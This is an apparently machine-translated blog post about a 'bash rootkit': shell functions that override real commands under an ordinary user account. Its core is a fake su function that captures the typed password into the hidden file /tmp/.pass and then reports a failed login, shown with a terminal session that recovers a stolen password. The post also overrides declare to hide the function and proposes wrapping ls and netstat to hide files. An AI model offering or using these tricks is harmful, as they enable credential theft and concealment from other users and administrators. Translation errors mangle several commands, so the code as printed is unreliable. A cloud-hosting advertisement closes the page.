An article in the S, which I recently saw during my BLOG review, found quite interesting. record it and practice shell when I have time to implement it.
An absolutely YY bash rootkit is purely funny.
Bash Command Execution Process: alias-> function-> built-in command-> external program.
You can build a function to overload external program execution. Example:
[Xiaoyu @ localdomain ~] $ Function su {echo "Hello world ";}
[Xiaoyu @ localdomain ~] $ Su
Hello world
[Xiaoyu @ localdomain ~] $
The defined function is executed. The actual/bin/su is not executed.
You can use the following functions to steal passwords:
[Xiaoyu @ localdomain tmp] $ function su {echo-n "Password:"; stty-echo; read pass; echo ""; echo $ pass >>>/tmp /. pass; sleep 3; echo "su: incorrect password"; stty echo ;}
[Xiaoyu @ localdomain tmp] $ touch/tmp/. pass
[Xiaoyu @ localdomain tmp] $ chmod a + w/tmp/. pass
[Xiaoyu @ localdomain tmp] $ su
Password:
Su: incorrect password
[Xiaoyu @ localdomain tmp] $ cat/tmp/. pass
123456
[Xiaoyu @ localdomain tmp] $
Obviously, the sample code I provided above is incomplete. You have to modify the code directly, for example, cancel su Function Definition after the password is stolen. Otherwise, the input is incorrect.
Bash has a declare-f command to view the defined functions.
[Xiaoyu @ localdomain tmp] $ declare-f
Su ()
{
Echo-n "Password :";
Stty-echo;
Read pass;
Echo "";
Echo $ pass>/tmp/. pass;
Sleep 3;
Echo "su: incorrect password ";
Stty echo
}
I can't see it, but it's okay that we can reload the bash execution order.
[Xiaoyu @ localdomain ~] $ Function declare {echo "Command not found ";}
[Xiaoyu @ localdomain ~] $ Declare-f
Command not found
You can see it.
Well, now I come back to the title. Why is it YY bash rootkit? Why didn't I see the shadow of rootkit? You can reload ls and netstat to first execute the binary file and save the execution result, for example, result = '/bin/ls'. Then, use a regular expression to filter the result and then display it. I will not give the specific code here.
The advantage of Bash rootkit is that you only have the permissions of common users and can install it. For example, you need to hide a file under a common user account and store something or something.
Well, that's all. Next time you think of something to write.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
